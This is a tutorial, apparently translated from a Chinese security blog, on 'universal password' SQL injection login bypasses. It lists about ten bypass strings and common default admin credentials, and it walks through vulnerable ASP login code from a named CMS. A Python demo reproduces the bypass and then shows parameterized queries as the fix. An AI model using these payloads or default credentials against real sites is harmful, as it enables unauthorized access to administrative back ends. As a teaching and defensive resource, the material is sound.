The universal password has been around for years. I used not to take it seriously, but its results really do come in handy. The back-end universal password means writing the following characters into the user name and password fields of a website's back-end login; if you know the administrator account, entering it directly in the account field works even better. For example, the first one we will use is: user name: "or"a"="a, password: "or"a"="a.

The common forms:
1: "or"a"="a
2: ').or.('a'='a
3: or 1=1--
4: 'or 1=1-
5: a' or '1=1-
6: ' or 1=1-
7: 'or.'a'='a
8: "or"="a'='a
9: 'or'a'='
10: 'or'='or'

The principle: 'or'='or' uses SQL syntax to perform an injection; it is one type of SQL injection, and it exists because the submitted characters are not filtered, or not filtered strictly. In fact it is not truly universal. Many back ends use default accounts such as admin/admin or admin/admin888, and a few ASP back-end login pages can be entered with the password 1'or'1'='1 (with a user name such as admin; try it) and the login succeeds. This is usually the first lesson in SQL injection, and it comes down to the SQL statement. When the login is verified, the logic is: if password = entered password, then login succeeds. Enter 1' or '1'='1 and the check becomes password='1' or '1'='1'. Because 1=1 is always true, and password='1' and '1'='1' are joined by a logical OR, the whole expression is TRUE, which means login succeeds. Does that make sense? Actually the title "back-end universal login password" is not very professional; "back-end verification bypass statement" would be better, but the former is more common.
Many people probably know, or have heard of, the statement ' xor. It is exclusive or. It behaves like or and and: or performs an OR operation, and performs an AND operation, and exclusive or (xor) is true when the two compared values differ and false when they are the same. I searched the Internet: where parameters are hardly filtered at all, you can use the classic 'or'='or' to get in, and 'xor' can get in as well; you can try it.

A shallow analysis of the website universal password 'or'='or' vulnerability

'or'='or' is a relatively old vulnerability that mainly appears in back-end logins. Using it, we can enter the system back end without entering the password. It occurs because of poor programming logic and because single quotes are not filtered, which leads to the bug. Here is a brief introduction to the principle; once we understand the principle, we can find such vulnerable systems ourselves.

1: The statements: ' or '=' or, 'a' or '1=1--, or1=1--, "or1=1--, "or"="a'='a, ') or ('a'='a, etc.

2: Analysis and use: from a webmaster website I downloaded the source code of the "Weaving Dream studio enterprise whole-station program (original, refined) modified beautified version" and found in it the back-end login page login.asp, which contains the following code (the numbers in the comments are referenced below):

```asp
<%
PWD = Request.Form("PWD")                           ' (1) get the password entered by the client and assign it to PWD
name = Request.Form("name")                         ' (2) get the user name entered by the client and assign it to name; neither is filtered
Set Conn = Server.CreateObject("ADODB.Connection")  ' (3) create the ADO Connection object
SQL = "select * From Manage_User where UserName='" & name & "' And PassWord='" & encrypt(PWD) & "'"   ' (4) place UserName and PassWord into the query statement
Set rs = Conn.Execute(SQL)                          ' (5) execute the SQL statement
If Not rs.EOF = True Then                           ' (6) the current record is before the end of the recordset, i.e. a row matched
    Session("Name") = rs("UserName")                ' (7) store the matched user name in the session
    Session("PassWord") = rs("PassWord")            ' (8) store the matched password in the session
    Response.Redirect "manage.asp"                  ' (9) redirect to manage.asp
Else                                                ' (10)
    Response.Redirect "loginsb.asp?MSG=You have entered the wrong account or password, please enter it again!"   ' (11)
End If                                              ' (12)
%>
```

From this code we can see that the back-end verification uses Session; as we all know, the other common method is cookie verification, but the principle is the same. From the analysis we can see that the back-end login does not filter the user name and password entered by the client at all; it hands them straight to the SQL query, and if the query finds a record (the record pointer is before the end of the recordset), the Session variables Name and PassWord are set and the browser is redirected to manage.asp.

A great many security holes emerge from the above analysis. The problem lies in lines (1) and (2), whose function is to obtain the user name and password entered by the client without any filtering; nothing checks our input data, so we can carry out the attack. The key to the attack is to make the result of the vulnerable SQL query true. Here we also need some knowledge of the or and and logical operators. I will not go into detail, just two points. First, precedence: when or and and appear at the same time, the and operator is evaluated first. Second, the AND operator means "and", the logical "and" of two expressions, and the OR operator means "or", the logical "or" of two expressions. The results of the two operators:

AND: true and true = true; false and true = false; true and false = false; false and false = false.
OR: true or true = true; false or true = true; true or false = true; false or false = false.

The query SQL = "select * from Manage_User where UserName='" & name & "' And PassWord='" & encrypt(PWD) & "'" must be made true. To do that we construct a special user name, which lets us bypass the authentication and enter the back end: type 'or'='or' in the user name and just 000 in the password, and the query becomes

select * from Manage_User where UserName=''or'='or'' and PassWord='000'

Or with the user name 1' or 1=1 or '1'='1 and the password 000:

select * from Manage_User where UserName='1' or 1=1 or '1'='1' and PassWord='000'

Practise these slowly and get a feel for them; I believe you will understand, and you can also construct statements to verify them yourself. For Session authentication we can also perform Session spoofing. Assuming we know the system administrator's user name admin, we only need to enter the statement in the password to make it true. Cookie login is the same as Session login.
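To make the two cases above concrete, the password-field case from the first section (1' or '1'='1 against a plaintext comparison) and the user-name case from the login.asp analysis, here is an added Python example; it is not code from this page or from the Weaving Dream program. It rebuilds the login.asp query against a constructed in-memory SQLite table named Manage_User with two made-up accounts. The encrypt() function is an assumption standing in for the page's encrypt(); SHA-256 is used only so the password column holds a hash. The example also evaluates the and-before-or precedence from the truth tables, and shows the fix: a parameterized query, where the same input is only data and can never change the statement.

```python
import hashlib
import sqlite3


def encrypt(pwd: str) -> str:
    """Assumed stand-in for login.asp's encrypt(): any one-way hash of the password."""
    return hashlib.sha256(pwd.encode("utf-8")).hexdigest()


def make_db(store_hashed: bool = True) -> sqlite3.Connection:
    """Constructed Manage_User table with two sample accounts (not real data).

    store_hashed=False keeps passwords in clear, the situation the page's
    'first lesson' describes; True mirrors login.asp, which compares encrypt(PWD).
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Manage_User (UserName TEXT, PassWord TEXT)")
    accounts = [("admin", "s3cret"), ("editor", "hunter2")]
    conn.executemany(
        "INSERT INTO Manage_User VALUES (?, ?)",
        [(u, encrypt(p) if store_hashed else p) for u, p in accounts],
    )
    return conn


def login_plaintext_concat(conn, name, pwd):
    """Plaintext compare built by string concatenation (the page's first lesson).

    Returns the user names the WHERE clause accepted; more than one means bypass.
    """
    sql = ("SELECT UserName FROM Manage_User WHERE UserName='" + name
           + "' AND PassWord='" + pwd + "'")
    return sorted(row[0] for row in conn.execute(sql))


def login_concat(conn, name, pwd):
    """Mirrors login.asp line (4): user name concatenated raw, password hashed first.

    Hashing the password closes the password field as an injection point, but the
    user name still reaches the parser unchanged.
    """
    sql = ("SELECT UserName FROM Manage_User WHERE UserName='" + name
           + "' AND PassWord='" + encrypt(pwd) + "'")
    return sorted(row[0] for row in conn.execute(sql))


def login_parameterized(conn, name, pwd):
    """The fix: placeholders bind both inputs as values, never as SQL text."""
    sql = "SELECT UserName FROM Manage_User WHERE UserName=? AND PassWord=?"
    return sorted(row[0] for row in conn.execute(sql, (name, encrypt(pwd))))


def evaluate(conn, expr):
    """Evaluate a constant boolean expression as the WHERE clause would (1 true, 0 false).

    Demo helper for the truth tables only; it is given fixed expressions, not user input.
    """
    return conn.execute("SELECT " + expr).fetchone()[0]


if __name__ == "__main__":
    plain = make_db(store_hashed=False)
    hashed = make_db()
    # password field, plaintext compare: password='1' or '1'='1' is always true
    print(login_plaintext_concat(plain, "admin", "1' or '1'='1"))      # ['admin', 'editor']
    # same input against login.asp's hashed compare: no effect
    print(login_concat(hashed, "admin", "1' or '1'='1"))              # []
    # user name field, the page's second example: or 1=1 makes every row match
    print(login_concat(hashed, "1' or 1=1 or '1'='1", "000"))         # ['admin', 'editor']
    # and is evaluated before or, as the page's precedence rule says
    print(evaluate(hashed, "0 AND 0 OR 1"), evaluate(hashed, "0 AND (0 OR 1)"))   # 1 0
    # parameterized: the same input is just a user name that does not exist
    print(login_parameterized(hashed, "1' or 1=1 or '1'='1", "000"))  # []
    print(login_parameterized(hashed, "admin", "s3cret"))             # ['admin']
```

One caveat on the page's 'or'='or' form: once concatenated it leaves the bare string literal '=' standing alone in the WHERE clause, so whether it bypasses depends on how the back-end database treats a string in a boolean context; SQLite evaluates it as false, which is why the example uses the page's 1=1 statements instead. The fix does not depend on that detail at all: with placeholders, any of the listed statements is compared byte-for-byte against the UserName column and matches nothing.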